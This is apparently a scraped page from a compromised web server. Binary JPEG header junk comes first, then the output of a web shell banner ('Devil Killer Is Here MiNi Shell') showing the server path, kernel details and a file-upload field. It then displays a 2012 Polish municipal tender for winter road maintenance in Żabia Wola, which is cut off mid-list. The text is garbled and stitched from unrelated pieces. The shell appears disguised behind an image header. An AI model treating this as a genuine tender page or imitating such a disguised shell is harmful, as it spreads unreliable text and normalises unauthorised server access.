JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121004/382004-N-2012.html

<p class="kh_header"><b>Żabia Wola: Wykonanie zimowego utrzymania dróg i ulic stanowiących własność Gminy Żabia Wola w sezonie zimowym 2012/2013</b><br>
<b>Numer ogłoszenia: 382004 - 2012; data zamieszczenia: 04.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żabia Wola , ul. Główna 3, 96-321 Żabia Wola, woj. mazowieckie, tel. 046 8578182, 8578224, faks 046 8578181.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabiawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie zimowego utrzymania dróg i ulic stanowiących własność Gminy Żabia Wola w sezonie zimowym 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  usługa zimowego utrzymania dróg stanowiących własność gminy.
Zimowe utrzymanie dróg ma na celu złagodzenie niedogodności związanych ze śniegiem i mrozem. Zasady prowadzonych prac oraz technologia usługi wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg ( zał. nr 8).
Usługa  polega na  oczyszczaniu dróg, ulic oraz obiektów towarzyszących ( zatoki autobusowe, parkingi) ze śniegu, lodu, błota i likwidacji śliskości zimowej, monitorowaniu i kontrolowaniu stanu nawierzchni dróg i ulic oraz jednokrotnym oczyszczeniu po okresie zimowym dróg. Ponad 50% dróg stanowią drogi o nawierzchni gruntowej i szerokości około 2,5-5,0 m, pozostałe o nawierzchni: bitumicznej, destruktowej, powierzchniowo utrwalonej emulsją asfaltową. 
Teren Gminy został podzielony na obszary (część I-VIII- odśnieżanie IX- zwalczanie śliskości ), które określają zasięg działania Wykonawców.  

Część I.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część II.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część III.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część IV.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część V.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VI.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VII.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ
Część VIII.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ

Część IX.	Zwalczanie śliskości dróg według  I i II kolejności. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ

JEDEN WYKONAWCA MOŻE ZŁOŻYĆ OFERTĘ MAKSYMALNIE NA 2 CZĘŚCI ZAMÓWIENIA.
 
UWAGA!

Przystąpienie do usuwania zjawisk na drogach dla części IX:
-	dla I kolejności śliskość 2 godziny od wystąpienia zjawisk po telefonicznym zgłoszeniu z Zamawiającego.
-	dla II kolejności  śliskość po telefonicznym zgłoszeniu  Zamawiającego do 3 godzin. 

Dla pozostałych części tj. I do VIII Wykonawcy przystąpią do usuwania zjawisk po telefonicznym uzgodnieniu z Zamawiającym z tym, że w pierwszej kolejności należy odśnieżyć drogi o nawierzchni utwardzonej, aby Wykonawca części IX mógł przystąpić do zwalczania śliskości,
Wykonawcy będą zobowiązani do współpracy ze sobą przy wykonywaniu usługi.

Przy opracowaniu oferty należy wziąć pod uwagę fakt, że Zamawiający nie przewiduje zapłaty za gotowość, a tylko za efektywną pracę. 

Wykonawca zobowiązany jest do dokonania  wizji lokalnej w terenie oraz uzyskaniu na swoją odpowiedzialność i ryzyko wszelkich istotnych informacji, które mogą być mu konieczne do przygotowania ofert. Wizję lokalną Wykonawca dokonuje na własny koszt

2.1. ZAKRES USŁUGI:
1)	Okres zimowego utrzymania dróg ustala się od dnia podpisania umowy do 30 kwietnia 2013 r. w tym czasie Wykonawca zobowiązany jest do prowadzenia zimowego utrzymania dróg, które oprócz akcji czynnej obejmuje również prowadzenie całodobowych dyżurów dyspozytorskich. 
2)	Rozpoczęcie i zakończenie utrzymania zimowego będzie uzależnione od warunków atmosferycznych i następuje na wyraźne polecenie Zamawiającego. 
3)	Upoważniony przedstawiciel Zamawiającego może zawiesić prowadzenia akcji zimowej, a także dokonać odwołania zawieszenia.
4)	Rozpoczęcie pracy sprzętu winno nastąpić nie później niż 2 godziny od momentu wystąpienia zjawiska lub zgłoszenia interwencji dotyczących utrudnień w ruchu na drodze przez Zmawiającego
5)	Rozpoczęcie pracy na drogach o nawierzchni utwardzonej niezwłocznie po zgłoszeniu przez Zamawiającego. 
6)	Wykonawca w czasie prowadzenia utrzymania zimowego dróg przyjmuje interwencje, oraz wykonuje prace związane z usunięciem przyczyn zgłaszanych interwencji i pełni całodobowy dyżur dyspozytorski.
7)	Na drogach objętych zimowym utrzymaniem mogą wystąpić utrudnienia i krótkotrwałe (2 godz.) przerwy w ruchu. Czas trwania utrudnień uzależniony jest od stanu zjawiska i czasu jego trwania. W przypadku skrajnie niekorzystnych warunków atmosferycznych i pogodowych (zawieje, zamiecie śnieżne, długotrwałe burze śnieżne niweczące efekty odśnieżania dróg) uniemożliwiających osiągnięcie i utrzymanie na drogach standardu docelowego, przejezdności, organizacje pracy wtedy należy dostosować do aktualnych zmieniających się warunków na drogach i przyjmować niekonwencjonalne rozwiązania.
8)	Termin zakończenia prac związanych z poziomym oczyszczeniem ulic i mostów z materiałów po zimowym utrzymaniu dróg ustala się do końca kwietnia 2013r..
9)	Poziome oczyszczanie dróg z materiałów po zimowym utrzymaniu dróg obejmuje oczyszczanie jezdni w miejscu występowania chodników wraz z nimi oraz obiektów mostowych.
10)	Po rozpoczęciu zimowego utrzymania dróg Wykonawca jest zobowiązany do całodobowego pełnienia dyżurów przy uwzględnieniu następujących warunków;
a)	całodobowa dostępność telefoniczna 
b)	każda jednostka sprzętowa jest wyposażona  w telefon komórkowy, z którym jest możliwy kontakt przez całą dobę.
c)	prowadzenia dokumentacji dyżurów i pracy sprzętu i 1 raz w tygodniu przekazywania do Urzędu Gminy 
d)	składania telefonicznych meldunków o stanie dróg Zamawiającemu w czasie akcji i codziennie
e)	prowadzenia zimowego utrzymania dróg zgodnie zobowiązującymi standardami zimowego utrzymania dróg ( zał. nr 8)
11)	wykonawca w czasie zimowego utrzymania prowadzi akcję czynną i pełni całodobowy dyżur dyspozytorski
12)	potwierdzenie wykonania akcji czynnej wykonawcy przez przedstawiciela Zamawiającego - Sołtysa wsi lub Radnego winno nastąpić niepóźnej niż w dniu następnym 
13)	Odśnieżanie dróg:
a)	Odśnieżanie dróg ma na celu usunięcie śniegu z jezdni i poboczy dróg oraz zatok autobusowych parkingów i chodników dróg przy których są chodniki.
b)	W zależności od zalegającego śniegu na jezdni jej nawierzchni i szerokości należy używać odpowiednich pługów lub zespołu pługów. Droga winna być odśnieżana na bieżąco  czasami nawet w trakcie  opadów śniegu tak, aby na nawierzchni nie zalegała większa warstwa śniegu niż 15 cm. 
c)	W przypadku skrajnie niekorzystnych warunków atmosferycznych i pogodowych (zawieje, zamiecie śnieżne) dopuszczalne jest odstępstwo od utrzymania w standardzie zgodnie z przyjętymi zasadami przy odśnieżaniu i zwalczaniu gołoledzi.
d)	W trudnych warunkach organizację pracy należy wtedy dostosować do aktualnych, zmieniających się warunków na drogach i przyjmowań niekonwencjonalne rozwiązanie, np. odśnieżanie tylko jednego pasa ruchu i prowadzenie pojazdów konwojami organizowanymi przy udziale policji, zaczynając od dróg o największym natężeniu ruchu, należy odśnieżać tylko jeden pas ruchu i wykonać mijanki w zasięgu widoczności 100-200 m
e)	Odśnieżanie mostów odbywa się jednocześnie podczas prac na danym ciągu drogowym.
f)	Śnieg zalegający na jezdni jest spychany na krawędź jezdni i chodnika. Należy zachować na chodniku przejście dla pieszych min. 0.7 m. place parkingowe i zatoki autobusowe odśnieża się jednocześnie z jezdnią i chodnikami.
g)	Przy odśnieżaniu dróg prace należy wykonać tak, aby śnieg usuwany z drogi nie był przenoszony na inne krzyżujące się drogi jak i zjazdy. W przypadku utworzenia się wału na krawędzi drogi jak i zjazdu należy usunąć zalegający śnieg. Nadmiar śniegu z dróg, parkingów, chodników należy wywieźć w miejsce zorganizowane we własnym zakresie Wykonawcy. Zjazdy do posesji odśnieżają we własnym zakresie właściciele posesji. Wjazdy na drogi prostopadłe do drogi objętej zimowym utrzymaniem odśnieża Wykonawca prowadzący akcję odśnieżania. 
h)	Zimowe utrzymanie chodników zgodnie z regulaminem Utrzymania Czystości i Porządku w Gminie zatwierdzonym uchwałą  nr 25/V/2007 z 29.03.2007 należy do właścicieli nieruchomości położonych wzdłuż chodników. Przedmiotem odśnieżania jest chodnik  Żabia Wola- Huta Żabiowolska-Józefina 
14)	Zwalczanie śliskości dróg:
a)	Do zapobiegania powstawania, likwidacji i łagodzenia śliskości zimowej stosuje się materiały uszorstniające.
b)	rozsypanie środków uszorstniających z domieszką sodu NACL w ilości 3-4 % wagowych 
c)	Zapobieganie powstawania gołoledzi i szronu - Działalność należy rozpocząć po stwierdzeniu, że temperatura nawierzchni jest ujemna i dalej wzrasta.
d)	Likwidowanie grubych warstw lodu , zlodowaciałego lub zbitego śniegu - Warstwy takie powinny być usuwane z nawierzchni mechanicznie. Warstwy tego typu mogą być również oszronione.
e)	Do rozsypywania materiałów uszorstniających należy używać urządzeń dających gwarancję użycia materiałów w ilości 50-150 g/m2
f)	Rozsypywarki środków chemicznych i materiałów uszorstniających muszą być łatwe w montażu i demontażu na środki transportowe, zapewnić płynną regulację rozsypywanych środków do zwalczania śliskości zimowej, równomierny wydatek na m2 bez względu na prędkość jazdy rozsypywarki.
g)	Talerz lub talerze rozsypujące muszą być usytuowane na odpowiedniej wysokości aby rozsypywany materiał nie powodował uszkodzeń karoserii pojazdów będących w ruchu.
h)	Zabrania się stosowania wszelkich mieszanek zawierających sól do usuwania śliskości na niżej wymienionych drogach o nawierzchni bitumicznej:
-	m. Nowa Bukówka ul. Rumiankowa 
-	m. Rumianka ul. Owocowa, ul. Orzechowa
-	m. Ojrzanów ul. Kresowa
-	m. Oddział Al. Lipowa,
-	m. Grzegorzewice, ul. Daleka, ul. Słoneczna, ul. Pałacowa
-	m. Żelechów ul. Krakowiańska, ul. Nad Lasem
-	m. Kaleń- Pieńki Zarębskie ul. Jaśminowa
-	m Osowiec ul Dworska, Parkowa, Falista
-	m Słubica ul. Słoneczna, ul. Kukułki
-	m. Zaręby ul. Zięby, ul. Skowronia
-	m. Skuły ul. Północna, ul. Okrężna
-	m. Jastrzębnik ul. Ziołowa- Mazowieckie Pola
-	m. Józefina ul. Gałązki
-	m. Władysławów ul. Na Skarpie, ul. Ku Rzece
-	m. Bieniewiec ul. Zagrodowa
-	m Ciepłe-Kaleń ul. Makowa
-	m. Pieńki Słubickie ul. Kukułki
-	m. Słubica A ul. Graniczna, 
-	m. Słubica W ul. Słowicza
-	m Bartoszówka ul. Strażacka
-	m. Siestrzeń Władysławów Nadrzeczna-Główna
-	m. Siestrzeń Władysławów Objazdowa-Przejazdowa
-	m. Kaleń Tow. -Lisówek ul. Wiśniowa
-	m Wycinki Osowskie ul. Brzozowa
-	m  Lasek ul. Popiele i ul. Słoneczna
Na przedmiotowych drogach do usuwania śliskości należy stosować materiały uszorstniające o uziarnieniu do 2 mm, kruszywo naturalne o uziarnieniu do 4 mm(zalecane do uszorstnienie ubitego śniegu) (piasek) bez domieszki soli.
i)	Materiał do posypywania nawierzchni zapewnia Wykonawca.
    Przed rozpoczęciem pracy operator powinien dokonać:
-	sprawdzenia stanu technicznego nośnika i sprzętu,
-	sprawdzenia zamocowania sprzętu na nośniku,
-	sprawdzenia stanu ogumienia oraz sprawdzenia prawidłowości działania:
-	układu hydraulicznego, 
-	układu jezdnego, kierowniczego i hamulcowego nośnika,
-	zaczepu nośnika,
-	oświetlenia pojazdu,
-	lampy błyskowej koloru żółtego.
 Nie należy rozpoczynać pracy do chwili, gdy zauważone usterki nie zostaną usunięte. Należy wykonać również niezbędne czynności konserwacyjne. 
  W czasie pracy operator powinien:
-	wykonywać wyłącznie czynności związane z obsługą sprzętu i prowadzeniem nośnika,
-	w sposób ciągły obserwować sprzęt roboczy i zwracać baczną uwagę na bezpieczeństwo osób i pojazdów znajdujących się w pobliżu,
-	przestrzegać obowiązujących zasad Kodeksu Drogowego.
-	Po zakończeniu pracy, pług należy pozostawić opuszczony, aby odciążyć zawieszenie, następnie sprzęt oczyścić i dokonać przeglądu. Wszelkie uszkodzenia sprzętu zagrażające bezpieczeństwu obsługi sprzętu jak i użytkownikom dróg należy niezwłocznie usunąć. 
- Należy dokonywać terminowo obsług technicznych sprzętu zgodnie z zaleceniami zawartymi w instrukcji obsługi i DTR..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 ustawy P.z.p.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Opis sposobu dokonywania oceny spełniania tego warunku - nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Wykonawca wykaże i udokumentuje (referencjami, protokołami odbioru końcowego bez usterek ), iż w okresie ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonał usługi  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. 5 km drogi w zakresie zimowego utrzymania  
b) wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy I doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia 

Opis sposobu dokonywania oceny spełniania warunku.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych usług i  dokumentów potwierdzających, że usługi zostały prawidłowo ukończone; na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują lub będą dysponować sprzętem i narzędziami, niezbędnymi do realizacji zamówienia;
co najmniej następującymi jednostkami sprzętu spośród wymienionych:
a)	w zakresie usuwania śliskości: pługo-piaskarka lub pługo-solarka lub pojazd do jednoczesnego usuwania śniegu i zwalczania śliskości w ilości 2 szt.
b)	w zakresie odśnieżania dróg w zależności od grubości zalegającego śniegu należy używać i dysponować 2 jednostkami sprzętu podstawowego i sprzętem pomocniczym 
-	pługów lemieszowych lekkich, średnich i ciężkich (w tym z możliwością zmiennej geometrii ustawienia lemiesza),
-	odśnieżarek mechanicznych, ślimakowo-wirnikowych, frezowo-wirnikowych, frezowo-bębnowych, turbinowych
-	równiarek różnych typów z zamontowanym pługiem czołowym dwustronnym, jak również lemieszem własnym 
     Do pługów lemieszowych:
-	lekkich - zalicza się opłużone pojazdy samochodowe o ładowności do 6t i ciągniki rolnicze,
-	średnich - zalicza się opłużone pojazdy samochodowe o ładowności do 6 do 8 ton, wszystkie    samochody o ładowności do 8 ton z napędem na 2 lub więcej osi,
-	ciężkich - zalicza się opłużone pojazdy samochodowe o ładowności ponad 8 ton.
     Sprzęt pomocniczy:
  Do odśnieżania dróg należy też używać sprzętu pomocniczego, jakim są:
-	spycharki gąsiennicowe i kołowe wyposażone w lemiesze, najlepiej o zmiennej geometrii, 
-	ładowarki wyposażone w lemiesze dwustronne, 
-	ciągniki rolnicze wyposażone w pługi lemieszowe jednostronne
Opis sposobu dokonywania oceny spełniania warunku.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku. 
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usługi w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Wykonawcy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia:
a)	co najmniej 3 osobami posiadającymi odpowiednią kategorię prawa jazdy, na każdy rejon obsługującymi  sprzęt pracujący na każdym rejonie
     Wymagania odnośnie obsługi sprzętu do odśnieżania:
Operatorem sprzętu może być kierowca  posiadający odpowiednie uprawnienia, tj. wymaganą kategorie prawa jazdy, znajomość Dokumentacji Techniczno-Ruchowej (DTR) 
Opis sposobu dokonywania oceny spełniania warunku.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku. 
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia oraz wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usługi w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;
Opis sposobu dokonywania oceny spełniania warunku.
Ocena spełnienia warunku dokonana będzie na podstawie załączonych przez Wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikać powinny informacje potwierdzające spełnianie warunku. 
Ocena spełniania warunku zostanie dokonana na podstawie złożonych dokumentów tj.  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
